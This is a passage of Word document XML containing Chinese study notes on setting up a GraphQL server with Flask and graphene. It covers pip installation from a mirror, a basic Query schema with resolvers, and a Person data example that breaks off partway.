    <w:p w14:paraId="1DFC69FA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="777A5151" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考链接：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>https://docs.graphene-python.org/en/latest/quickstart/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A8E904B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A4252DB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>pip</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>安装过程：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D716B96" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>python3 -m pip  install -i http://mirrors.aliyun.com/pypi/simple/ graphene</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23390CAC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>python3 -m pip  install -i http://mirrors.aliyun.com/pypi/simple/ Flask-GraphQL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EA7D848" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>python3 -m pip -i http://mirrors.aliyun.com/pypi/simple/ install graphql-core==2.2.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68212C07" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>python3 -m pip install -i http://mirrors.aliyun.com/pypi/simple/ graphene==2.1.8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BA2FBA2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>python3 -m pip install graphene-sqlalchemy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="169C4FB2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05AA0AFA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6773CBD8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="588" w:name="_Toc159780021"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>flask</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>搭建</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>graphql</w:t>
      </w:r>
      <w:bookmarkEnd w:id="588"/>
    </w:p>
    <w:p w14:paraId="6060120E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60A19533" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>from graphene import ObjectType, String, Schema</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31E5B7DE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>from flask import Flask</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54CBA088" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>from flask_graphql import GraphQLView</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22DA55ED" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D1F3ABE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>class Query(ObjectType):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="221D561B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    # this defines a Field `hello` in our Schema with a single Argument `name`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A7CFD6F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    hello = String(name=String(default_value="stranger"))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08136AF0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    goodbye = String()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BFA23F8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7642D66E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    # our Resolver method takes the GraphQL context (root, info) as well as</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D29252E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    # Argument (name) for the Field and returns data for the query Response</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E845338" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>def resolve_hello(root, info, name):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2579486A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t># GraphQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>要求每个字段提供</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>resolver function</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38DBBF68" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        return f'Hello {name}!'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="614ADBC3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0FDD9FA9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    def resolve_goodbye(root, info):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4442C560" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        return 'See ya!'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="509AC971" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D2EDE86" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>class PersonType(ObjectType):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A1B98CA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>任何</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>root</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>的树枝子类需要继承</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>ObjectType</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FC15C9E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    first_name = String()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="780AEE10" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    last_name = String()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="565BE5C1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    age = Int()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E8A0664" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    def resolve_first_name(person, info):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3023E5AC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        return person.first_name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C2ECBED" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    def resolve_last_name(person, info):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A523822" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        return person.last_name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F406611" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    def resolve_age(person, info):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04985B5E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        return person.age</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63F5D9AC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69AC81FC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>schema = Schema(query=Query)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A038CF9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t xml:space="preserve"># Schema(query=??) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>这是要给</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>graphQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>查询树的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t xml:space="preserve"> root </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>，通常该</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>root</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>类命名为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t xml:space="preserve"> Query</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1543D991" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>app = Flask(__name__)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66FE507D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>app.add_url_rule('/graphql', view_func=GraphQLView.as_view('grapql', schema=schema, graphiql=True))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4562A9D2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>app.run(debug=True)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7519B208" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75CFC774" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="589" w:name="_Toc159780022"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查询</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>schema</w:t>
      </w:r>
      <w:bookmarkEnd w:id="589"/>
    </w:p>
    <w:p w14:paraId="3F23925E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通过发送</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>graphql</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>字符串到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> execute </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数查询自己的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>schema</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52B30946" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39779633" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>import collections</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BC9FF37" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>from graphene import ObjectType, String, Schema, Int, Field</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F50AEE8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>Person = collections.namedtuple("Person", ['first_name', 'last_name', 'age'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6552D086" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>就是进行元组命名</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35168124" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>data = {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B652176" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    1: Person("steve", "jobs", 56),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31C18E79" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    2: Person("bill", "gates", 63),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6983934B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    3: Person("ken", "thompson", 76),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77B68E31" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    4: Person("guido", "rossum", 63)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3179E7DC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CC0B8B7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="787B1D7E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>class PersonType(ObjectType):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="262762E3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>first_name = String()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50095889" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t xml:space="preserve">    last_name = String()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="119650D8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t xml:space="preserve">    age = Int()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EA83679" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="263EAF27" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    def resolve_first_name(person, info):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DD233EC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        return person.first_name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="141ECCE3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7CA6E65F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    def resolve_last_name(person, info):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29E0B669" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        return person.last_name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CC2A333" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="41FBB930" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    def resolve_age(person, info):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FC4239" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        return person.age</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1885721B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="527730C7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>class Query(ObjectType):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41971A42" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    person = Field(PersonType)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CD73941" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47BC664D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
